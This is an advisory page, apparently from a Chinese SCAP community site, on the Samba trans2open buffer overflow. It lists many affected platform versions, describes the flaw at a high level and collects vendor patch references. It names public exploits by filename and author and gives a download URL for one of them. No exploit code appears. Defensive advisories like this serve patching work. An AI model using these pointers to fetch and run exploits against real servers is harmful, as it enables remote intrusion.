- Wirex Immunix OS 7.0
- Wirex Immunix OS 6.2
- Wirex Immunix OS 6.2
Samba Samba 2.0.8
- Caldera OpenLinux 2.4
- Caldera OpenLinux 2.4
- Conectiva Linux 6.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Conectiva Linux 4.0
- Conectiva Linux graficas
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2 68k
- Debian Linux 2.2
- Debian Linux 2.2
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SCO eServer 2.3.1
- Sun Solaris 8_x86
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 7.0
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0
- Wirex Immunix OS 7.0
- Wirex Immunix OS 6.2
- Wirex Immunix OS 6.2
Samba Samba 2.0.7
+ Caldera OpenLinux 2.3
+ Caldera OpenLinux 2.3
+ Conectiva Linux 6.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Conectiva Linux ecommerce
+ Debian Linux 2.3 sparc
+ Debian Linux 2.3 sparc
+ Debian Linux 2.3 powerpc
+ Debian Linux 2.3 powerpc
+ Debian Linux 2.3 alpha
+ Debian Linux 2.3 alpha
+ Debian Linux 2.3
+ Debian Linux 2.3
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Debian Linux 2.2
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 7.0
+ Progeny Debian 1.0
+ Progeny Debian 1.0
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i686
+ RedHat Linux 7.0 i686
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0
+ RedHat Linux 7.0
+ RedHat Linux 6.2 E sparc
+ RedHat Linux 6.2 E i386
+ RedHat Linux 6.2 E alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ SCO eDesktop 2.4
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ SCO eServer 2.3.1
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ 550 4100R
+ Sun Cobalt RaQ 550 4100R
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ XTR 3500R
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
+ Trustix Secure Linux 1.1
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
+ Wirex Immunix OS 6.2
Samba Samba 2.0.6
+ Red Hat Linux 6.2
+ Red Hat Linux 6.2
+ RedHat Linux 6.2 sparcv9
+ RedHat Linux 6.2 sparcv9
+ RedHat Linux 6.2 E sparc
+ RedHat Linux 6.2 E sparc
+ RedHat Linux 6.2 E i386
+ RedHat Linux 6.2 E i386
+ RedHat Linux 6.2 E alpha
+ RedHat Linux 6.2 E alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.2 alpha
+ Sun Cobalt RaQ4 3001R
Samba Samba 2.0.5
- Caldera OpenLinux 2.3
- Caldera OpenLinux 2.3
- SCO eServer 2.3.1
Samba Samba 2.0.4
+ Debian Linux 2.1
+ RedHat Linux 6.0
+ RedHat Linux 6.0
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 i386
+ RedHat Linux 4.2
+ RedHat Linux 4.2
Samba Samba 2.0.3
Samba Samba 2.0.2
Samba Samba 2.0.1
Samba Samba 2.0 .0
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.24
HP HP-UX 10.20
HP HP-UX 10.0 1
HP CIFS/9000 Server A.01.09.02
HP CIFS/9000 Server A.01.09.01
HP CIFS/9000 Server A.01.09
HP CIFS/9000 Server A.01.08.01
HP CIFS/9000 Server A.01.08
HP CIFS/9000 Server A.01.07
HP CIFS/9000 Server A.01.06
- HP HP-UX 11.11
- HP HP-UX 11.0
HP CIFS/9000 Server A.01.05
Compaq Tru64 5.1 b PK1 (BL1)
Compaq Tru64 5.1 b
Compaq Tru64 5.1 a PK3 (BL3)
Compaq Tru64 5.1 a PK2 (BL2)
Compaq Tru64 5.1 a PK1 (BL1)
Compaq Tru64 5.1 a
Compaq Tru64 5.1 PK6 (BL20)
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1
Compaq Tru64 5.0 f
Compaq Tru64 5.0 a PK3 (BL17)
Compaq Tru64 5.0 a
Compaq Tru64 5.0 PK4 (BL18)
Compaq Tru64 5.0 PK4 (BL17)
Compaq Tru64 5.0
Compaq Tru64 4.0 g PK3 (BL17)
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f PK7 (BL18)
Compaq Tru64 4.0 f PK6 (BL17)
Compaq Tru64 4.0 f
Compaq Tru64 4.0 d PK9 (BL17)
Compaq Tru64 4.0 d
Compaq Tru64 4.0 b
Apple Mac OS X 10.2.4
Apple Mac OS X 10.2.3
Apple Mac OS X 10.2.2
Apple Mac OS X 10.2.1
Apple Mac OS X 10.2
Samba-TNG Samba-TNG 0.3.2
Samba Samba 3.0 alpha
Samba Samba 2.2.8 a
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.2
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. Linux Personal 8.2
HP CIFS/9000 Server A.01.09.04
HP CIFS/9000 Server A.01.09.03
Apple Mac OS X 10.2.5

- 不受影响的程序版本

Samba-TNG Samba-TNG 0.3.2
Samba Samba 3.0 alpha
Samba Samba 2.2.8 a
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.2
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. Linux Personal 8.2
HP CIFS/9000 Server A.01.09.04
HP CIFS/9000 Server A.01.09.03
Apple Mac OS X 10.2.5

- 漏洞讨论

A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.

Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.

It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Reports indicate that this vulnerability is being exploited actively in the wild.

An exploit has been made available by H D Moore of Digital Defense and is available from the following location:

http://www.digitaldefense.net/labs/tools/trans2root.pl

A new exploit (sambal.c) has been released by eSDee of Netric Security.

A new exploit (0x82-Remote.54AAb4.xpl.c) has been released by "you dong-hun"(Xpl017Elz), &lt;szoahc@hotmail.com&gt;.

A new exploit (0x333hate.c) has been released by c0wboy &lt;c0wboy@tiscali.it&gt;.

An exploit (samba_trans2open.pm) has been released as part of the MetaSploit Framework 2.0.

An exploit for Mac OS X has been released as part of the MetaSploit Framework 2.3.

- 解决方案

This vulnerability has been addressed in Samba-TNG 0.3.2.

Samba 2.2.8a has been released which addresses this issue. Samba is currently developing patches which will specifically address this issue in version 2.2.7a and 2.0.10. Users are advised to upgrade as soon as possible.

Sun has released an alert(ID: 53581) notification and a patch to address this issue.

This issue is addressed in MacOS X 10.2.5. An update can be applied via the
Software Update pane in System Preferences. Releases prior to 10.2.5 shipped with a vulnerable version of Samba.

SGI has released a security advisory (20030403-01-P) containing fixes which address this issue.

Slackware has released a security advisory (2003-04-08) containing fixes which address this issue.

Debian has released a security advisory (DSA 280-1) containing fixes which address this issue.

OpenPKG has released a security advisory (OpenPKG-SA-2003.028) containing fixes which address this issue.

Mandrake has released a security advisory (MDKSA-2003:044) containing fixes which address this issue.

FreeBSD has released a security note (FreeBSD-SN-03:01) which contains updated ports information. Further information can be found in the attached advisory.

Immunix has released a security advisory (IMNX-2003-7+-006-01) which contains fixes which address this issue for Samba 2.0.10. Users are advised to upgrade as soon as possible.

SuSE has released a security advisory (SuSE-SA:2003:025) containing fixes which address this issue. Further information regarding how to obtain and apply fixes can be found in the attached advisory.

Trustix has released a security advisory (TSLSA-2003-0019) containing fixes to address this issue.

Sorcerer has released an advisory containing fix information. Further details can be found in the attached message reference.

Conectiva has released an advisory (CLA-2003:624) containing fixes which address this issue. Users are advised to upgrade as soon as possible.

Red Hat has revised its advisory (RHSA-2003:137-02). See referenced advisory for new fix details.

Gentoo Linux has released an advisory. Users who have installed net-fs/samba are advised to upgrade to samba-2.2.8a by issuing the following commands:

emerge sync
emerge samba
emerge clean

HP has revised its advisory HPSBUX004-254. HP has stated that CIFS Server 2.2e version A.01.09.04 is not vulnerable to this issue. Affected users are advised to download and install the new version from http://software.hp.com. Further information is available in the referenced advisory.

Veritas has determined that various ServPoint NAS releases are affected by this vulnerability. Patches are currently being developed. Users are advised to contact the vendor for further information regarding how to obtain fixes.

SCO has released a revised version of security advisory CSSA-2003-SCO.13 for OpenServer to address this issue. Details on obtaining updates are available in the referenced advisory.


Samba-TNG Samba-TNG 0.3

Samba-TNG Samba-TNG 0.3.1

Apple Mac OS X 10.2

Apple Mac OS X 10.2.1

Apple Mac OS X 10.2.2

Apple Mac OS X 10.2.3

Apple Mac OS X 10.2.4

Samba Samba 2.0.10

Samba Samba 2.0.7

Samba Samba 2.0.9

Samba Samba 2.2 .0

Samba Samba 2.2 .0a

Samba Samba 2.2.1 a

Samba Samba 2.2.2

Samba Samba 2.2.3 a

Samba Samba 2.2.3 a

Samba Samba 2.2.4

Samba Samba 2.2.5

Samba Samba 2.2.6

Samba Samba 2.2.7 a

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站